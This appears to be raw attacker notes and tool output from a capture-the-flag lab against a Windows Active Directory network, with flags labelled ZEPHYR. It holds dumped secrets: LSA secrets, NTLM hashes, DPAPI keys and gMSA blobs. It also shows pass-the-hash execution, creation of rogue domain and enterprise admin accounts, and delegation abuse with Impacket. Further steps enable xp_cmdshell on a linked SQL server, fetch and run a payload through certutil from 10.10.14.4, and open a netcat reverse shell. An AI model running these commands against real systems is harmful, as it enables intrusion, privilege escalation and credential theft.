ZSM\ZPH-SVRADFS1$:plain_password_hex:a9723786a4f3bfd47aed7f7b5af91aea583274dd3e66baa45ff1a9178238918fdb29d094f5c66cc94a47f054fd93f26a8991498f31f465296377b8b02c7bd7c2033bc3b58756dcc4fe581b99c30098f2904aeb360833fcec2436e12f3b90b10563bcd7cdfd46e9a331e10a9adf79a2ca5ae96f300aa166d67d36d5929b61e81669b2ad1a490ded9d4ac00cf62671108094aba5b1136683d3ee86da651d15a22652bec2f0df761ad75598dc0efa4418bed7677a4cd0f2a15bbc95370768028adc6c850ea157c2d906e4a146e66f7e85cfbf55ca0e9466955bd47e71edb5ecfe1f2ef1e44fd22fc419739da3c0c3444077
ZSM\ZPH-SVRADFS1$:aad3b435b51404eeaad3b435b51404ee:24039a7fd44d8decd80b0897e333ec06:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x05341d094f374bb97fd82b3a19619bbc3d28e967
dpapi_userkey:0xc4de07634653cdeda95b1baea5a86ceaa9683003
[*] NL$KM
0000 95 E8 38 F2 47 8A 41 12 A5 77 CA 0A 23 E6 56 28 ..8.G.A..w..#.V(
0010 85 56 73 10 A9 49 99 6A B5 5D FB C5 AD B4 4C 76 .Vs..I.j.]....Lv
0020 3A 07 D8 40 73 ED EE 03 28 5E A6 02 7E 09 38 EA :..@s...(^..~.8.
0030 48 55 7F 6D 9C FD 9A 8B C1 F1 F4 D7 0A 6F 3B D0 HU.m.........o;.
NL$KM:95e838f2478a4112a577ca0a23e6562885567310a949996ab55dfbc5adb44c763a07d84073edee03285ea6027e0938ea48557f6d9cfd9a8bc1f1f4d70a6f3bd0
[*] _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911
0000 46 E1 C3 6A F7 6C 78 9D 44 A1 57 77 F3 91 5D DC F..j.lx.D.Ww..].
0010 08 C5 13 51 DA C4 52 19 74 D7 D4 17 38 6C 69 FC ...Q..R.t...8li.
0020 CC DD F1 45 F3 8C 72 C6 51 19 4B 98 84 76 A6 B9 ...E..r.Q.K..v..
0030 5C CF 8F 52 ED 3E 3C AE 4E 2C 95 54 A0 80 32 EB \..R.><.N,.T..2.
0040 87 AA 5E D5 9D 61 EE FD 3A 80 63 40 F6 68 30 7B ..^..a..:.c@.h0{
0050 FC 1E B8 88 96 22 C4 8A 3C 38 F7 6B 4B B7 F5 EC ....."..<8.kK...
0060 22 22 09 E7 E2 39 91 3A C2 31 F8 14 B8 87 1C F2 ""...9.:.1......
0070 8E 18 AA D1 FC C4 92 F8 BA E9 21 62 E4 3A 3E 07 ..........!b.:>.
0080 C1 CD D9 AE 47 79 21 A6 72 34 E5 72 DA 73 D6 C1 ....Gy!.r4.r.s..
0090 C1 3A CF 30 E3 74 C5 14 A2 CF 37 38 43 DF 26 DA .:.0.t....78C.&.
00a0 B2 C6 D6 E9 AE CC E9 12 68 90 61 AB 6B 4D F2 CA ........h.a.kM..
00b0 CE 92 98 CD 86 BE 84 2E 07 8B 3E 44 30 56 61 6A ..........>D0Vaj
00c0 F8 F1 06 B8 F3 EB 36 F3 A0 EC 3E 1C 0B E6 EE 2F ......6...>..../
00d0 F3 47 A2 67 23 0A F6 24 9C 6C 92 86 81 53 6C 7A .G.g#..$.l...Slz
00e0 5B 85 91 D9 20 41 27 99 26 12 00 A7 32 B0 69 32 [... A'.&...2.i2
_SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911:46e1c36af76c789d44a15777f3915ddc08c51351dac4521974d7d417386c69fcccddf145f38c72c651194b988476a6b95ccf8f52ed3e3cae4e2c9554a08032eb87aa5ed59d61eefd3a806340f668307bfc1eb8889622c48a3c38f76b4bb7f5ec222209e7e239913ac231f814b8871cf28e18aad1fcc492f8bae92162e43a3e07c1cdd9ae477921a67234e572da73d6c1c13acf30e374c514a2cf373843df26dab2c6d6e9aecce912689061ab6b4df2cace9298cd86be842e078b3e443056616af8f106b8f3eb36f3a0ec3e1c0be6ee2ff347a267230af6249c6c928681536c7a5b8591d920412799261200a732b06932
[*] _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911
0000 01 00 00 00 24 02 00 00 10 00 12 01 14 02 1C 02 ....$...........
0010 1A FF 10 1F 7F 61 70 52 F2 C0 21 31 13 BC 93 28 .....apR..!1...(
0020 09 28 8E A0 99 D7 CA 77 2C 09 81 96 72 02 76 46 .(.....w,...r.vF
0030 BE A5 09 7C 34 07 09 22 41 68 F1 29 CD EE 92 FA ...|4.."Ah.)....
0040 8F 8E 52 65 6A AE 17 62 1A 4A 95 19 6B DC 7C B6 ..Rej..b.J..k.|.
0050 29 7E 64 5A 36 27 25 69 F0 5F 44 67 4A CA B4 A6 )~dZ6'%i._DgJ...
0060 AB 00 15 C0 65 9E 16 AA 3A 56 BA D8 1D D1 A4 BB ....e...:V......
0070 62 13 D0 9B 47 8E C2 AE BB 90 39 D0 A6 40 8B 75 b...G.....9..@.u
0080 FC DF 15 77 CF C0 BC E3 9E B8 79 11 36 F7 D3 5E ...w......y.6..^
0090 38 15 DF 93 BC CB 93 FB 00 37 BF F6 96 12 74 FE 8........7....t.
00a0 18 D4 72 24 4E 98 B4 7E FE F1 35 3D A4 3F FA 44 ..r$N..~..5=.?.D
00b0 9A FB 89 BC AE 30 6D 43 B9 7B 31 DB 78 BE 34 CD .....0mC.{1.x.4.
00c0 DB 30 91 06 06 F0 40 C7 86 B9 8C F8 E3 1F 88 69 .0....@........i
00d0 08 22 05 B4 8B F3 8D 4E 00 79 D5 AE FE AF 8A CC .".....N.y......
00e0 52 EC DA 47 18 B5 C6 FB 01 E8 71 F9 5F 9B 75 8A R..G......q._.u.
00f0 A3 91 92 14 A7 E2 91 48 54 51 5B B4 30 3F 76 21 .......HTQ[.0?v!
0100 53 43 5B 09 9F 5A 45 8F 43 44 30 5C 93 F5 86 26 SC[..ZE.CD0\...&
0110 00 00 73 74 50 3E 1E 0A A6 C4 72 43 65 66 C0 A3 ..stP>....rCef..
0120 CD 13 DE AC 53 FE C9 1E 18 2D DE A6 BA 41 A9 5A ....S....-...A.Z
0130 A8 22 B7 BE 30 D9 1D 33 BB 2C AE 4D 46 2C D7 FC ."..0..3.,.MF,..
0140 89 DF F8 FB 57 65 6F E3 1A D5 9C C3 2F F5 8E 79 ....Weo...../..y
0150 A6 19 92 30 38 0E 22 9F FA F2 0F 26 79 DE 60 C3 ...08."....&y.`.
0160 D9 C3 74 F2 22 87 59 64 3E 51 00 52 0C 38 69 2B ..t.".Yd>Q.R.8i+
0170 0E FD 07 F1 00 9C 58 1A FA 9B B3 F5 81 44 B6 E0 ......X......D..
0180 80 33 85 A2 A2 FA CB 79 35 2F AB 35 0C E9 51 57 .3.....y5/.5..QW
0190 35 1A 5D 6F 95 EE 2C A9 19 9F 44 C7 3E 20 1E 88 5.]o..,...D.> ..
01a0 FF 51 DF E5 66 40 7E 87 A6 7E 64 F9 98 68 D5 6C .Q..f@~..~d..h.l
01b0 5F C2 CD 20 97 25 7C EB B8 F8 04 8B 18 49 16 D4 _.. .%|......I..
01c0 FC D8 85 C0 DF 03 26 9F B9 B9 69 1C 91 03 12 13 ......&...i.....
01d0 88 6B C4 A0 D0 5F 69 58 61 73 7C 40 77 A9 6D 0D .k..._iXas|@w.m.
01e0 BB B8 3F 44 D6 41 0C E7 70 61 74 87 D5 63 E3 36 ..?D.A..pat..c.6
01f0 FE E3 07 71 99 07 D4 A5 09 7E F8 B0 F7 3F 07 DB ...q.....~...?..
0200 87 A9 13 22 82 3E BC 61 02 3C 0E 28 BF 10 04 2D ...".>.a.<.(...-
0210 B4 51 00 00 BD 1B BD D9 88 0B 00 00 BD BD EC 26 .Q.............&
0220 88 0B 00 00 ....
_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7173406ca77cc6735d798543e206bebde6373acbd63b8c0b63d4bd20f180f911:01000000240200001000120114021c021aff101f7f617052f2c0213113bc932809288ea099d7ca772c09819672027646bea5097c340709224168f129cdee92fa8f8e52656aae17621a4a95196bdc7cb6297e645a36272569f05f44674acab4a6ab0015c0659e16aa3a56bad81dd1a4bb6213d09b478ec2aebb9039d0a6408b75fcdf1577cfc0bce39eb8791136f7d35e3815df93bccb93fb0037bff6961274fe18d472244e98b47efef1353da43ffa449afb89bcae306d43b97b31db78be34cddb30910606f040c786b98cf8e31f8869082205b48bf38d4e0079d5aefeaf8acc52ecda4718b5c6fb01e871f95f9b758aa3919214a7e2914854515bb4303f762153435b099f5a458f4344305c93f5862600007374503e1e0aa6c472436566c0a3cd13deac53fec91e182ddea6ba41a95aa822b7be30d91d33bb2cae4d462cd7fc89dff8fb57656fe31ad59cc32ff58e79a6199230380e229ffaf20f2679de60c3d9c374f2228759643e5100520c38692b0efd07f1009c581afa9bb3f58144b6e0803385a2a2facb79352fab350ce95157351a5d6f95ee2ca9199f44c73e201e88ff51dfe566407e87a67e64f99868d56c5fc2cd2097257cebb8f8048b184916d4fcd885c0df03269fb9b9691c91031213886bc4a0d05f695861737c4077a96d0dbbb83f44d6410ce770617487d563e336fee307719907d4a5097ef8b0f73f07db87a91322823ebc61023c0e28bf10042db4510000bd1bbdd9880b0000bdbdec26880b0000
[*] Cleaning up...
[*] Stopping service RemoteRegistry
└─$ cme smb 192.168.210.14 -u Administrator -H '8f97e25e06fa0276f8ac5285638eeeba' --local-auth -x 'type C:\Users\Administrator\Desktop\flag.txt'
SMB 192.168.210.14 445 ZPH-SVRADFS1 [*] Windows 10.0 Build 20348 x64 (name:ZPH-SVRADFS1) (domain:ZPH-SVRADFS1) (signing:False) (SMBv1:False)
SMB 192.168.210.14 445 ZPH-SVRADFS1 [+] ZPH-SVRADFS1\Administrator:8f97e25e06fa0276f8ac5285638eeeba (Pwn3d!)
SMB 192.168.210.14 445 ZPH-SVRADFS1 [+] Executed command via atexec
SMB 192.168.210.14 445 ZPH-SVRADFS1 ZEPHYR{C4n7_F0rg3t_ab0u7_7h1s_0n3} : The Forgotten
.19
net user jay Pass123!test /add /domain
net group "Enterprise Admins" jay /add /domain
on .16
net user jay Pass@123!test /add /domain
net group "Domain Admins" jay /add /domain
Add-DomainObjectAcl -TargetIdentity ZSM-SVRCSQL02$ -PrincipalIdentity jay -Rights All
on linux
addcomputer.py -method LDAPS -computer-name attackersystem3$ -computer-pass 'Summer2018!' -dc-host 192.168.210.16 'internal.zsm.local/jay:Pass@123!test'
rbcd.py -delegate-from attackersystem3$ -delegate-to ZSM-SVRCSQL02$ -action 'write' 'internal.zsm.local/jay:Pass@123!test'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attackersystem3$ can now impersonate users on ZSM-SVRCSQL02$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] attackersystem3$ (S-1-5-21-3056178012-3972705859-491075245-17602)
getST.py -spn 'cifs/ZSM-SVRCSQL02.internal.zsm.local' -impersonate 'Administrator' 'internal.zsm.local/attackersystem3$:Summer2018!'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
New-ADUser -SamAccountName "ipsec" -UserPrincipalName "ipsec@internal.zsm.local" -Name "ipsec" -Enable $true -AccountPassword $Password -PassThru -Server "internal.zsm.local"
New-ADUser -SamAccountName "newusername" -UserPrincipalName "newusername@childdomain.local" -Name "New User" -GivenName "New" -Surname "User" -Enabled $true -AccountPassword $Password -PassThru -Server "DCofChildDomain.childdomain.local"
.19
mssqlclient.py zsm.local/zabbix:rDhHbBEfh35sMbkY@192.168.210.15
exec_as_login sa
select srvname from master..sysservers
select * from openquery("ZSM-SVRCSQL02", 'SELECT is_srvrolemember(''sysadmin'')')
select is_rpc_out_enabled FROM sys.servers WHERE name ='ZSM-SVRCSQL02'
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';
-- Enable show advanced options on the linked server
EXEC('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [ZSM-SVRCSQL02];
-- Enable xp_cmdshell on the linked server
EXEC('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [ZSM-SVRCSQL02];
-- Optionally, you can disable show advanced options again for security
EXEC('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [ZSM-SVRCSQL02];
-- Execute 'whoami' command on the linked server
EXEC('EXEC xp_cmdshell ''whoami'';') AT [ZSM-SVRCSQL02];
-- Execute 'ipconfig' command on the linked server
EXEC('EXEC xp_cmdshell ''ipconfig'';') AT [ZSM-SVRCSQL02];
EXEC('EXEC xp_cmdshell ''certutil -urlcache -f http://10.10.14.4:53/SHALLOW_SPADE.exe C:\Users\mssql_svc\Documents\SHALLOW_SPADE.exe'';') AT [ZSM-SVRCSQL02];
EXEC('EXEC xp_cmdshell ''C:\Users\mssql_svc\Documents\SHALLOW_SPADE.exe'';') AT [ZSM-SVRCSQL02];
upload nc64.exe
upload RunasCs.exe
nc -lvvp 53
./RunasCs.exe -l 3 jay Pass@123!test -d internal.zsm.local 'c:\users\mssql_svc\documents\nc64.exe 10.10.14.4 53 -e cmd.exe'
C:\Users\Administrator\Desktop>type flag.txt
type flag.txt
ZEPHYR{G0tt4_l1nk_Up_4m_1_r1gh7?}
$secpasswd = ConvertTo-SecureString "Pass@123!test" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("jay", $secpasswd)
Invoke-Command -ComputerName ZPH-SVRCSUP -ScriptBlock { Get-ChildItem C:\ } -Credential $mycreds
.18 is from .17
$user = 'internal\melissa'
$passwd= 'WinterIsHere2022!'
$secpass = ConvertTo-SecureString $passwd -AsPlainText -Force
$cred = new-object system.management.automation.PSCredential $user,$secpass
Invoke-Command -ComputerName ZPH-SVRCSUP -Credential $cred -ScriptBlock {type c:\users\administrator\desktop\flag.txt}
ZEPHYR{D0n7_f0rg3t_Imp0rt4nt_Inf0rm4710n}